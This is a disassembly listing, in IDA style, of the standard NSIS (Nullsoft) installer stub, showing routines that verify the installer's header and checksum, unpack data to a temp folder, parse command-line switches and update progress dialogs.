push [ebp+arg_0]
call ds:dword_408084 ; CloseHandle
jmp loc_4031C3
; ---------------------------------------------------------------------------
loc_40304A: ; CODE XREF: sub_401610+19C3�j
inc [ebp+var_4]
push offset aFileExtracti_0 ; "File Extraction: failed createprocess o"...
call sub_40614C
pop ecx
pop ecx
jmp loc_4031C3
; ---------------------------------------------------------------------------
loc_40305E: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
test esi, esi ; jumptable 0040166B case 61
jz short loc_403097
push edx
push offset aSettingsLoggin ; "settings logging to %d"
call sub_40614C
mov eax, [ebp+var_34]
push eax
push offset aLoggingSetToD ; "logging set to %d"
mov dword_423F78, eax
call sub_40614C
add esp, 10h
cmp [ebp+var_34], 0
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
call sub_4040E9
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_403097: ; CODE XREF: sub_401610+1A50�j
xor esi, esi
inc esi
call sub_401508
push eax
push offset aS ; "%s"
loc_4030A5: ; CODE XREF: sub_401610+369�j
; sub_401610+37B�j ...
call sub_40614C
pop ecx
loc_4030AB: ; CODE XREF: sub_401610+22D�j
pop ecx
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_4030B1: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor ecx, ecx ; jumptable 0040166B case 62
call sub_4014F2
mov edi, eax
cmp edi, dword_42640C
jnb loc_401A40
mov eax, [ebp+var_30]
mov esi, edi
imul esi, 418h
add esi, dword_426408
test eax, eax
jl short loc_4030F2
mov ecx, [esi+eax*4]
jnz short loc_4030EF
add esi, 18h
push esi
push ebx
loc_4030E5: ; CODE XREF: sub_401610+9D5�j
; sub_401610+1754�j
call sub_405FFD ; lstrcpy
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_4030EF: ; CODE XREF: sub_401610+1ACE�j
push ecx
jmp short loc_403167
; ---------------------------------------------------------------------------
loc_4030F2: ; CODE XREF: sub_401610+1AC9�j
or ecx, 0FFFFFFFFh
sub ecx, eax
mov [ebp+var_30], ecx
jz short loc_403109
xor ecx, ecx
inc ecx
call sub_4014F2
mov [ebp+var_34], eax
jmp short loc_403119
; ---------------------------------------------------------------------------
loc_403109: ; CODE XREF: sub_401610+1AEA�j
push [ebp+var_28]
lea eax, [esi+18h]
push eax
call sub_4065B7
or byte ptr [esi+9], 1
loc_403119: ; CODE XREF: sub_401610+1AF7�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_34]
mov [esi+eax*4], ecx
cmp [ebp+var_2C], 0
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push edi
call sub_40117D
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_403137: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor ecx, ecx ; jumptable 0040166B case 63
call sub_4014F2
cmp eax, 20h
jnb loc_401A40
xor ecx, ecx
cmp [ebp+var_2C], ecx
jz short loc_40316F
cmp [ebp+var_30], ecx
jz short loc_403160
push eax
call sub_4012A8
call sub_40129E
jmp short loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_403160: ; CODE XREF: sub_401610+1B41�j
push ecx
call sub_4012F3
loc_403166: ; CODE XREF: sub_401610+1707�j
push eax
loc_403167: ; CODE XREF: sub_401610+1AE0�j
push ebx
loc_403168: ; CODE XREF: sub_401610+1BE�j
call sub_405F5B
jmp short loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_40316F: ; CODE XREF: sub_401610+1B3C�j
cmp [ebp+var_30], ecx
jz short loc_403186
mov ecx, [ebp+var_34]
mov edx, dword_4263E8
mov [edx+eax*4+94h], ecx
jmp short loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_403186: ; CODE XREF: sub_401610+1B62�j
mov ecx, dword_4263E8
push dword ptr [ecx+eax*4+94h]
push ebx
call sub_4065B7
jmp short loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_40319B: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
mov eax, dword_4229E8 ; jumptable 0040166B case 66
push 0
and eax, esi
push eax
push 0Bh
push [ebp+var_10]
call ds:dword_408278 ; SendMessageA
cmp [ebp+var_38], 0
jz short loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push 0
push 0
push [ebp+var_10]
call ds:dword_40825C ; InvalidateRect
loc_4031C3: ; CODE XREF: sub_401610+668�j
; sub_401610+6DF�j ...
cmp [ebp+var_C], 0
jz short loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push [ebp+var_C]
loc_4031CC: ; CODE XREF: sub_401610+A04�j
; sub_401610+E8B�j
call ds:dword_40813C ; GlobalFree
loc_4031D2: ; CODE XREF: sub_401610+55�j
; sub_401610+5B�j ...
mov eax, [ebp+var_4] ; default
; jumptable 0040166B cases 64,65
add dword_426468, eax
loc_4031DB: ; CODE XREF: sub_401610+67E�j
; sub_401610+16A6�j
xor eax, eax
loc_4031DD: ; CODE XREF: sub_401610+72�j
; sub_401610+E9�j ...
pop edi
pop esi
pop ebx
leave
retn 4
sub_401610 endp
; ---------------------------------------------------------------------------
off_4031E4 dd offset loc_401672, offset loc_401687, offset loc_4016A9
; DATA XREF: sub_401610+5B�r
dd offset loc_4016C6, offset loc_4016FE, offset loc_40174D ; jump table for switch statement
dd offset loc_401777, offset loc_4017D3, offset loc_4017FF
dd offset loc_401842, offset loc_40189E, offset loc_401790
dd offset loc_4017A7, offset loc_4017C6, offset loc_4018E0
dd offset loc_401990, offset loc_4019F5, offset loc_401A29
dd offset loc_401A4C, offset loc_401D33, offset loc_401D44
dd offset loc_401D8A, offset loc_401DAF, offset loc_401DC3
dd offset loc_401E49, offset loc_401E6C, offset loc_401EA4
dd offset loc_401EE1, offset loc_401F6D, offset loc_401F8D
dd offset loc_402043, offset loc_402043, offset loc_40210E
dd offset loc_40212C, offset loc_402149, offset loc_402166
dd offset loc_4021C3, offset loc_40223F, offset loc_402281
dd offset loc_40230E, offset loc_4023E0, offset loc_402410
dd offset loc_4024A0, offset loc_402608, offset loc_402786
dd offset loc_402819, offset loc_402840, offset loc_4028CA
dd offset loc_40290D, offset loc_4029A0, offset loc_402AC7
dd offset loc_402B3F, offset loc_402B9D, offset loc_402BB8
dd offset loc_402BDD, offset loc_402C2A, offset loc_402CE9
dd offset loc_402D1C, offset loc_402D37, offset loc_402D69
dd offset loc_402D95, offset loc_40305E, offset loc_4030B1
dd offset loc_403137, offset loc_4031D2, offset loc_4031D2
dd offset loc_40319B
off_4032F0 dd offset loc_401F06 ; DATA XREF: sub_401610+8EF�r
dd offset loc_401F0A ; jump table for switch statement
dd offset loc_401F0E
dd offset loc_401F15
dd offset loc_401F22
dd offset loc_401F26
dd offset loc_401F2A
dd offset loc_401F2E
dd offset loc_401F37
dd offset loc_401F41
dd offset loc_401F4D
dd offset loc_401F61
dd offset loc_401F65
; ---------------------------------------------------------------------------
loc_403324: ; DATA XREF: sub_403420+10E�o
; sub_403756+14D�o
mov eax, [esp+8]
cmp eax, 110h
push ebp
mov ebp, [esp+8]
push esi
mov esi, 113h
jnz short loc_403355
push 0
push 0FAh
push 1
push ebp
call ds:dword_408188 ; SetTimer
mov eax, [esp+18h]
mov dword_41C194, eax
mov eax, esi
loc_403355: ; CODE XREF: .text:00403338�j
cmp eax, esi
jnz short loc_4033D0
mov ecx, dword_41C190
mov eax, dword_41C198
cmp ecx, eax
jl short loc_40336A
mov ecx, eax
loc_40336A: ; CODE XREF: .text:00403366�j
push ebx
push edi
push eax
push 64h
push ecx
call ds:dword_408124 ; MulDiv
mov edi, ds:dword_408230
mov ebx, eax
mov eax, dword_41C194
test eax, eax
mov esi, offset dword_40C0C8
jz short loc_4033B1
push ebx
push eax
push esi
call edi ; wsprintfA
add esp, 0Ch
push esi
push ebp
call ds:dword_408184 ; SetWindowTextA
push esi
push 406h
push ebp
call sub_405D57 ; SetDlgItemTextA
push 5
push ebp
call ds:dword_408228 ; ShowWindow
loc_4033B1: ; CODE XREF: .text:0040338A�j
test byte ptr dword_40A040, 1
jz short loc_4033CE
push ebx
push offset a___D ; "... %d%%"
push esi
call edi ; wsprintfA
add esp, 0Ch
push esi
push 0
call sub_40509F
loc_4033CE: ; CODE XREF: .text:004033B8�j
pop edi
pop ebx
loc_4033D0: ; CODE XREF: .text:00403357�j
pop esi
xor eax, eax
pop ebp
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033D7 proc near ; CODE XREF: sub_401610+18C8�p
; sub_403420+7B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_4]
push 0
lea eax, [ebp+arg_4]
push eax
push esi
push [ebp+arg_0]
push dword_40A00C
call ds:dword_408148 ; ReadFile
test eax, eax
jz short loc_403402
cmp [ebp+arg_4], esi
jnz short loc_403402
xor eax, eax
inc eax
jmp short loc_403404
; ---------------------------------------------------------------------------
loc_403402: ; CODE XREF: sub_4033D7+1F�j
; sub_4033D7+24�j
xor eax, eax
loc_403404: ; CODE XREF: sub_4033D7+29�j
pop esi
pop ebp
retn 8
sub_4033D7 endp
; =============== S U B R O U T I N E =======================================
sub_403409 proc near ; CODE XREF: sub_401610+18BD�p
; sub_403420+39�p ...
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
push dword_40A00C
call ds:dword_40814C ; SetFilePointer
retn 4
sub_403409 endp
; =============== S U B R O U T I N E =======================================
sub_403420 proc near ; CODE XREF: sub_40362B+30�p
; sub_40362B+70�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
arg_0 = dword ptr 4
sub esp, 24h
push ebx
push ebp
push esi
push edi
xor edi, edi
mov [esp+34h+var_24], edi
call ds:dword_4080B4 ; GetTickCount
mov esi, dword_4201A0
sub esi, dword_4201AC
mov ebx, eax
add esi, [esp+34h+arg_0]
add ebx, 1F4h
cmp esi, edi
jle loc_403611
push dword_4201A8
call sub_403409
push edi
push edi
push dword_4201AC
push dword_40A010
call ds:dword_40814C ; SetFilePointer
mov dword_41C198, esi
mov dword_41C190, edi
loc_40347E: ; CODE XREF: sub_403420+1B5�j
mov eax, dword_4201A4
sub eax, dword_4201A8
mov ebp, 4000h
cmp eax, ebp
jg short loc_403494
mov ebp, eax
loc_403494: ; CODE XREF: sub_403420+70�j
push ebp
mov esi, offset dword_41C1A0
push esi
call sub_4033D7
test eax, eax
jz loc_40361D
add dword_4201A8, ebp
mov dword_414120, esi
mov dword_414124, ebp
loc_4034BA: ; CODE XREF: sub_403420+18E�j
cmp dword_4263E8, edi
jz loc_403546
cmp dword_426480, edi
jnz short loc_403546
cmp [esp+34h+var_24], edi
jz short loc_403513
mov eax, dword_41C198
sub eax, dword_4201A0
mov esi, ds:dword_408254
sub eax, [esp+34h+arg_0]
add eax, dword_4201AC
mov dword_41C190, eax
jmp short loc_403501
; ---------------------------------------------------------------------------
loc_4034F6: ; CODE XREF: sub_403420+EF�j
lea eax, [esp+34h+var_1C]
push eax
call ds:dword_408258 ; DispatchMessageA
loc_403501: ; CODE XREF: sub_403420+D4�j
push 1
push edi
push edi
lea eax, [esp+40h+var_1C]
push edi
push eax
call esi ; PeekMessageA
test eax, eax
jnz short loc_4034F6
jmp short loc_403546
; ---------------------------------------------------------------------------
loc_403513: ; CODE XREF: sub_403420+B2�j
call ds:dword_4080B4 ; GetTickCount
cmp eax, ebx
jbe short loc_403546
mov eax, dword_4263E0
neg eax
sbb eax, eax
not eax
and eax, offset aUnpackingDataD ; "unpacking data: %d%%"
push eax
push offset loc_403324
push edi
push 6Fh
push dword_4263E4
call ds:dword_408190 ; CreateDialogParamA
mov [esp+34h+var_24], eax
loc_403546: ; CODE XREF: sub_403420+A0�j
; sub_403420+AC�j ...
push offset dword_414108
mov dword_414128, offset dword_414190
mov dword_41412C, 8000h
call sub_4069FF
test eax, eax
pop ecx
jl loc_403626
mov esi, dword_414128
mov eax, offset dword_414190
sub esi, eax
jz short loc_4035B6
push edi
lea ecx, [esp+38h+var_20]
push ecx
push esi
push eax
push dword_40A010
call ds:dword_408144 ; WriteFile
test eax, eax
jz loc_403622
cmp esi, [esp+34h+var_20]
jnz loc_403622
add dword_4201AC, esi
cmp dword_414124, edi
jnz loc_4034BA
jmp short loc_4035C2
; ---------------------------------------------------------------------------
loc_4035B6: ; CODE XREF: sub_403420+15A�j
cmp dword_414124, edi
jnz short loc_403626
cmp ebp, edi
jz short loc_403626
loc_4035C2: ; CODE XREF: sub_403420+194�j
mov eax, dword_4201A0
mov ecx, eax
sub ecx, dword_4201AC
add ecx, [esp+34h+arg_0]
test ecx, ecx
jg loc_40347E
push edi
push edi
push eax
push dword_40A010
call ds:dword_40814C ; SetFilePointer
mov esi, [esp+34h+var_24]
cmp esi, edi
jz short loc_403611
mov eax, dword_41C198
push edi
push edi
push 113h
push esi
mov dword_41C190, eax
call ds:dword_408278 ; SendMessageA
push esi
call ds:dword_40818C ; DestroyWindow
loc_403611: ; CODE XREF: sub_403420+2D�j
; sub_403420+1D0�j
xor eax, eax
loc_403613: ; CODE XREF: sub_403420+200�j
; sub_403420+209�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 24h
retn 4
; ---------------------------------------------------------------------------
loc_40361D: ; CODE XREF: sub_403420+82�j
or eax, 0FFFFFFFFh
jmp short loc_403613
; ---------------------------------------------------------------------------
loc_403622: ; CODE XREF: sub_403420+172�j
; sub_403420+17C�j
push 0FFFFFFFEh
jmp short loc_403628
; ---------------------------------------------------------------------------
loc_403626: ; CODE XREF: sub_403420+147�j
; sub_403420+19C�j ...
push 0FFFFFFFDh
loc_403628: ; CODE XREF: sub_403420+204�j
pop eax
jmp short loc_403613
sub_403420 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40362B proc near ; CODE XREF: sub_401610+69D�p
; sub_401610+1460�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
push esi
push edi
xor edi, edi
cmp eax, edi
jl short loc_403657
mov ecx, dword_426438
push edi
add eax, ecx
push edi
push eax
push dword_40A010
mov dword_4201A0, eax
call ds:dword_40814C ; SetFilePointer
loc_403657: ; CODE XREF: sub_40362B+E�j
push 4
pop esi
push esi
call sub_403420
cmp eax, edi
jl loc_403750
push ebx
mov ebx, ds:dword_408148
push edi
lea eax, [ebp+var_4]
push eax
push esi
lea eax, [ebp+arg_0]
push eax
push dword_40A010
call ebx ; ReadFile
test eax, eax
jz loc_40374C
cmp [ebp+var_4], esi
jnz loc_40374C
push [ebp+arg_0]
add dword_4201A0, esi
call sub_403420
cmp eax, edi
mov [ebp+var_8], eax
jl loc_40374F
cmp [ebp+arg_8], edi
jnz short loc_40371B
cmp [ebp+arg_0], edi
jle loc_403747
mov esi, offset dword_41C1A0
loc_4036BE: ; CODE XREF: sub_40362B+E8�j
mov edi, 4000h
cmp [ebp+arg_0], edi
jge short loc_4036CB
mov edi, [ebp+arg_0]
loc_4036CB: ; CODE XREF: sub_40362B+9B�j
push 0
lea eax, [ebp+var_4]
push eax
push edi
push esi
push dword_40A010
call ebx ; ReadFile
test eax, eax
jz short loc_40374C
cmp edi, [ebp+var_4]
jnz short loc_40374C
push 0
lea eax, [ebp+arg_C]
push eax
push [ebp+var_4]
push esi
push [ebp+arg_4]
call ds:dword_408144 ; WriteFile
test eax, eax
jz short loc_403717
cmp [ebp+arg_C], edi
jnz short loc_403717
mov eax, [ebp+var_4]
add [ebp+var_8], eax
sub [ebp+arg_0], eax
add dword_4201A0, eax
cmp [ebp+arg_0], 0
jg short loc_4036BE
jmp short loc_403747
; ---------------------------------------------------------------------------
loc_403717: ; CODE XREF: sub_40362B+CE�j
; sub_40362B+D3�j
push 0FFFFFFFEh
jmp short loc_40374E
; ---------------------------------------------------------------------------
loc_40371B: ; CODE XREF: sub_40362B+83�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_C]
jl short loc_403726
mov eax, [ebp+arg_C]
loc_403726: ; CODE XREF: sub_40362B+F6�j
push edi
lea ecx, [ebp+var_4]
push ecx
push eax
push [ebp+arg_8]
push dword_40A010
call ebx ; ReadFile
test eax, eax
jz short loc_40374C
mov eax, [ebp+var_4]
add dword_4201A0, eax
mov [ebp+var_8], eax
loc_403747: ; CODE XREF: sub_40362B+88�j
; sub_40362B+EA�j
mov eax, [ebp+var_8]
jmp short loc_40374F
; ---------------------------------------------------------------------------
loc_40374C: ; CODE XREF: sub_40362B+58�j
; sub_40362B+61�j ...
push 0FFFFFFFDh
loc_40374E: ; CODE XREF: sub_40362B+EE�j
pop eax
loc_40374F: ; CODE XREF: sub_40362B+7A�j
; sub_40362B+11F�j
pop ebx
loc_403750: ; CODE XREF: sub_40362B+37�j
pop edi
pop esi
leave
retn 10h
sub_40362B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403756 proc near ; CODE XREF: start+1ED�p
var_15C = dword ptr -15Ch
var_14C = byte ptr -14Ch
var_48 = byte ptr -48h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
push ebx
push esi
xor ebx, ebx
push edi
mov [ebp+var_4], ebx
call ds:dword_4080B4 ; GetTickCount
push 400h
mov esi, offset dword_42CC00
push esi
push dword_4263E4
add eax, 3E8h
mov [ebp+var_8], eax
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
call ds:dword_40815C ; GetModuleFileNameA
push 3
push 80000000h
push esi
call sub_405E7A
mov edi, eax
cmp edi, 0FFFFFFFFh
mov dword_40A00C, edi
jnz short loc_4037B6
mov eax, offset aErrorLaunching ; "Error launching installer"
jmp loc_403A5B
; ---------------------------------------------------------------------------
loc_4037B6: ; CODE XREF: sub_403756+54�j
push esi
call sub_406207
push ebx
push edi
call ds:dword_4080BC ; GetFileSize
cmp eax, ebx
mov dword_41C198, eax
mov esi, eax
jle loc_4038F1
loc_4037D3: ; CODE XREF: sub_403756+187�j
mov eax, dword_426448
neg eax
sbb eax, eax
and eax, 7E00h
add eax, 200h
cmp esi, eax
mov edi, esi
jl short loc_4037EE
mov edi, eax
loc_4037EE: ; CODE XREF: sub_403756+94�j
push edi
push offset dword_40C108
call sub_4033D7
test eax, eax
jz loc_4039A5
cmp dword_426448, ebx
jnz short loc_403884
push 1Ch
push offset dword_40C108
lea eax, [ebp+var_2C]
push eax
call sub_405E5A
mov ecx, [ebp+var_2C]
test ecx, 0FFFFFFE0h
jnz loc_4038BA
cmp [ebp+var_28], 0DEADBEEFh
jnz loc_4038BA
cmp [ebp+var_1C], 74736E49h
jnz short loc_4038BA
cmp [ebp+var_20], 74666F73h
jnz short loc_4038BA
cmp [ebp+var_24], 6C6C754Eh
jnz short loc_4038BA
mov eax, [ebp+var_14]
cmp eax, esi
jg loc_4039F6
or [ebp+arg_0], ecx
test byte ptr [ebp+arg_0], 8
mov edx, dword_41C190
mov dword_426448, edx
jnz short loc_403876
test byte ptr [ebp+arg_0], 4
jnz short loc_4038E3
loc_403876: ; CODE XREF: sub_403756+118�j
inc [ebp+var_10]
lea esi, [eax-4]
cmp edi, esi
jbe short loc_4038BA
mov edi, esi
jmp short loc_4038BA
; ---------------------------------------------------------------------------
loc_403884: ; CODE XREF: sub_403756+B1�j
test byte ptr [ebp+arg_0], 2
jnz short loc_4038BA
cmp [ebp+var_4], ebx
jnz loc_40398D
call ds:dword_4080B4 ; GetTickCount
cmp eax, [ebp+var_8]
jbe short loc_4038BA
push offset aVerifyingInsta ; "verifying installer: %d%%"
push offset loc_403324
push ebx
push 6Fh
push dword_4263E4
call ds:dword_408190 ; CreateDialogParamA
mov [ebp+var_4], eax
loc_4038BA: ; CODE XREF: sub_403756+CC�j
; sub_403756+D9�j ...
cmp esi, dword_41C198
jge short loc_4038D3
push edi
push offset dword_40C108
push [ebp+var_C]
call sub_40137E
mov [ebp+var_C], eax
loc_4038D3: ; CODE XREF: sub_403756+16A�j
add dword_41C190, edi
sub esi, edi
cmp esi, ebx
jg loc_4037D3
loc_4038E3: ; CODE XREF: sub_403756+11E�j
cmp [ebp+var_4], ebx
jz short loc_4038F1
push [ebp+var_4]
call ds:dword_40818C ; DestroyWindow
loc_4038F1: ; CODE XREF: sub_403756+77�j
; sub_403756+190�j
cmp dword_426448, ebx
jz loc_4039F6
cmp [ebp+var_10], ebx
jz short loc_40392C
push dword_41C190
call sub_403409
push 4
lea eax, [ebp+var_8]
push eax
call sub_4033D7
test eax, eax
jz loc_4039F6
mov eax, [ebp+var_C]
cmp eax, [ebp+var_8]
jnz loc_4039F6
loc_40392C: ; CODE XREF: sub_403756+1AA�j
push [ebp+var_18]
call sub_405DBB
push offset dword_414108
mov esi, eax
call sub_4069DB
lea eax, [ebp+var_14C]
mov [esp+15Ch+var_15C], offset aCDocume1SriUse ; "C:\\DOCUME~1\\SRI-user\\LOCALS~1\\Temp\\"
push eax
call sub_405EA9
push ebx
push 4000100h
push 2
push ebx
push ebx
push 0C0000000h
lea eax, [ebp+var_14C]
push eax
call ds:dword_4080B8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov dword_40A010, eax
jnz short loc_4039B5
mov eax, offset aErrorWritingTe ; "Error writing temporary file. Make sure"...
jmp loc_403A5B
; ---------------------------------------------------------------------------
loc_403983: ; CODE XREF: sub_403756+248�j
lea eax, [ebp+var_48]
push eax
call ds:dword_408258 ; DispatchMessageA
loc_40398D: ; CODE XREF: sub_403756+137�j
push 1
push ebx
push ebx
lea eax, [ebp+var_48]
push ebx
push eax
call ds:dword_408254 ; PeekMessageA
test eax, eax
jnz short loc_403983
jmp loc_4038BA
; ---------------------------------------------------------------------------
loc_4039A5: ; CODE XREF: sub_403756+A5�j
cmp [ebp+var_4], ebx
jz short loc_4039F6
push [ebp+var_4]
call ds:dword_40818C ; DestroyWindow
jmp short loc_4039F6
; ---------------------------------------------------------------------------
loc_4039B5: ; CODE XREF: sub_403756+221�j
mov eax, dword_426448
add eax, 1Ch
push eax
call sub_403409
mov ecx, [ebp+var_2C]
push [ebp+var_18]
not ecx
and ecx, 4
mov dword_4201A8, eax
sub eax, ecx
mov ecx, [ebp+var_14]
push esi
push ebx
lea eax, [eax+ecx-1Ch]
push 0FFFFFFFFh
mov dword_4201A4, eax
call sub_40362B
cmp eax, [ebp+var_18]
jz short loc_4039FD
push esi
call ds:dword_40813C ; GlobalFree
loc_4039F6: ; CODE XREF: sub_403756+FF�j
; sub_403756+1A1�j ...
mov eax, offset aTheInstallerYo ; "The installer you are trying to use is "...
jmp short loc_403A5B
; ---------------------------------------------------------------------------
loc_4039FD: ; CODE XREF: sub_403756+297�j
test byte ptr [ebp+arg_0], 2
mov dword_4263E8, esi
jz short loc_403A0C
or dword ptr [esi], 8
loc_403A0C: ; CODE XREF: sub_403756+2B1�j
mov eax, [esi]
and eax, 18h
test byte ptr [ebp+arg_0], 10h
mov dword_426480, eax
jz short loc_403A20
or byte ptr [esi+1], 4
loc_403A20: ; CODE XREF: sub_403756+2C4�j
test byte ptr [ebp+var_2C], 1
mov eax, [esi]
mov dword_426444, eax
jz short loc_403A33
inc dword_426440
loc_403A33: ; CODE XREF: sub_403756+2D5�j
push 8
lea eax, [esi+44h]
pop ecx
loc_403A39: ; CODE XREF: sub_403756+2E9�j
sub eax, 8
add [eax], esi
dec ecx
jnz short loc_403A39
mov eax, dword_4201A0
mov [esi+3Ch], eax
push 40h
add esi, 4
push esi
push offset dword_426400
call sub_405E5A
xor eax, eax
loc_403A5B: ; CODE XREF: sub_403756+5B�j
; sub_403756+228�j ...
pop edi
pop esi
pop ebx
leave
retn 4
sub_403756 endp
; =============== S U B R O U T I N E =======================================
sub_403A62 proc near ; CODE XREF: start+4A�p start+6B�p
push esi
mov esi, offset aCDocume1SriUse ; "C:\\DOCUME~1\\SRI-user\\LOCALS~1\\Temp\\"
push esi
call sub_406009
push esi
call sub_405DE6
test eax, eax
jnz short loc_403A7A
pop esi
retn
; ---------------------------------------------------------------------------
loc_403A7A: ; CODE XREF: sub_403A62+14�j
push esi
call sub_4061A6
push 0
push esi
call ds:dword_4080C4 ; CreateDirectoryA
push esi
push offset byte_42C000
call sub_405EA9
pop esi
retn
sub_403A62 endp
; =============== S U B R O U T I N E =======================================
sub_403A96 proc near ; CODE XREF: start:loc_403DA4�p
mov eax, dword_40A00C
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_408084
jz short loc_403AB1
push eax
call esi ; CloseHandle
or dword_40A00C, 0FFFFFFFFh
loc_403AB1: ; CODE XREF: sub_403A96+F�j
mov eax, dword_40A010
cmp eax, 0FFFFFFFFh
jz short loc_403AC5
push eax
call esi ; CloseHandle
or dword_40A010, 0FFFFFFFFh
loc_403AC5: ; CODE XREF: sub_403A96+23�j
push 7
push offset dword_42D800
call sub_4067E6
mov eax, dword_4201B0
test eax, eax
pop esi
jz short locret_403AE9
push eax
call ds:dword_40813C ; GlobalFree
and dword_4201B0, 0
locret_403AE9: ; CODE XREF: sub_403A96+43�j
retn
sub_403A96 endp
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_BC = dword ptr -0BCh
var_B4 = dword ptr -0B4h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_70 = dword ptr -70h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
sub esp, 20h
push ebx
push ebp
push esi
push edi
xor edi, edi
mov [esp+30h+var_1C], edi
mov ebx, offset aErrorWritingTe ; "Error writing temporary file. Make sure"...
mov [esp+30h+var_20], 20h
call ds:dword_408028
push edi
call ds:dword_408294
push offset aNsisError_0 ; "NSIS Error"
push offset aNsisError ; "NSIS Error"
mov dword_426490, eax
call sub_405FFD ; lstrcpy
mov esi, offset aCDocume1SriUse ; "C:\\DOCUME~1\\SRI-user\\LOCALS~1\\Temp\\"
push esi
mov ebp, 400h
push ebp
call ds:dword_4080E0 ; GetTempPathA
call sub_403A62
test eax, eax
jnz short loc_403B62
push 3FBh
push esi
call ds:dword_4080DC ; GetWindowsDirectoryA
push offset aTemp ; "\\Temp"
push esi
call ds:dword_4080A4 ; lstrcat
call sub_403A62
test eax, eax
jz loc_403DA4
loc_403B62: ; CODE XREF: start+51�j
mov esi, offset byte_42C000
push esi
call ds:dword_408128 ; DeleteFileA
push ebp
call ds:dword_4080D8 ; GetCommandLineA
mov ebx, ds:dword_4080D4
push eax
push esi
call ebx ; lstrcpyn
push 0
call ds:dword_408068 ; GetModuleHandleA
cmp ds:byte_42C000, 22h
mov dword_4263E4, eax
jnz short loc_403B9F
mov byte ptr [esp+68h+var_58], 22h
mov esi, offset byte_42C001
loc_403B9F: ; CODE XREF: start+A9�j
push [esp+68h+var_58]
push esi
call sub_405DCA
push eax
call ds:dword_408198 ; CharNextA
mov esi, eax
mov [esp+6Ch+var_54], esi
jmp loc_403CCC
; ---------------------------------------------------------------------------
loc_403BBB: ; CODE XREF: start+1E6�j
cmp al, 20h
jnz short loc_403BC5
loc_403BBF: ; CODE XREF: start+D9�j
inc esi
cmp byte ptr [esi], 20h
jz short loc_403BBF
loc_403BC5: ; CODE XREF: start+D3�j
cmp byte ptr [esi], 22h
mov byte ptr [esp+6Ch+var_5C], 20h
jnz short loc_403BD5
inc esi
mov byte ptr [esp+6Ch+var_5C], 22h
loc_403BD5: ; CODE XREF: start+E3�j
cmp byte ptr [esi], 2Fh
jnz loc_403CBA
inc esi
mov al, [esi]
cmp al, 53h
jnz short loc_403BF3
mov cl, [esi+1]
or cl, 20h
cmp cl, 20h
jnz short loc_403BF3
or edi, 2
loc_403BF3: ; CODE XREF: start+F9�j start+104�j
cmp dword ptr [esi], 4352434Eh
jnz short loc_403C09
mov cl, [esi+4]
or cl, 20h
cmp cl, 20h
jnz short loc_403C09
or edi, 4
loc_403C09: ; CODE XREF: start+10F�j start+11A�j
cmp dword ptr [esi-2], 3D442F20h
jz loc_403D2D
cmp al, 58h
jz short loc_403C22
cmp al, 78h
jnz loc_403CBA
loc_403C22: ; CODE XREF: start+12E�j
mov al, [esi+1]
or al, 20h
cmp al, 20h
jnz loc_403CBA
lea eax, [esi+2]
mov cl, [eax]
or edi, 12h
cmp cl, 22h
mov [esp+6Ch+var_50], edi
jnz short loc_403C49
mov byte ptr [esp+6Ch+var_5C], cl
add esi, 3
jmp short loc_403C61
; ---------------------------------------------------------------------------
loc_403C49: ; CODE XREF: start+154�j
cmp cl, 20h
jz loc_403D03
test cl, cl
jz loc_403D03
mov byte ptr [esp+6Ch+var_5C], 20h
mov esi, eax
loc_403C61: ; CODE XREF: start+15D�j
push [esp+6Ch+var_5C]
push esi
call sub_405DCA
test eax, eax
jz loc_403D41
sub eax, esi
inc eax
inc eax
push ebp
mov edi, eax
